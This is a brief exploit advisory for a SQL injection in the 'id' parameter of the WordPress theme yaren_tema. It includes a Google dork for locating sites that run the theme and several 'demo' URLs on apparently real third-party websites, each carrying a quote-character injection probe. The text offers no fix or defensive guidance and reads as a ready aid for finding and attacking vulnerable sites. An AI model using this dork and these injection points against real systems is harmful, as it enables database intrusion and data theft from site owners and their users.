# Exploit Title: Wordpress yaren_tema theme SQL injection # # Google Dork: inurl:/wp-content/themes/yaren_tema/burclar.php?id= # # Date: 2012-26-11 # Exploit Author: Ashiyane Digital Security Team # # Discovered by : Amirh03in # # Tested on: Linux # # Security Risk : High - SQL Injection # =================================== =================================== # Location: http://site.com//wp-content/themes/yaren_tema/burclar.php?id=[SQL] # # Demo : http://zelish.com/wp-content/themes/yaren_tema/burclar.php?id=kova%27 # http://www.falanca.com/wp-content/themes/yaren_tema/burclar.php?id=ikizler%27 # http://www.eksilikofte.com/wp-content/themes/yaren_tema/burclar.php?id=koc%27 # http://www.pufnoktasi.net/wp-content/themes/yaren_tema/burclar.php?id=boga%27 # ======================================= ======================================= Greetz to: My Lord ALLAH =======================================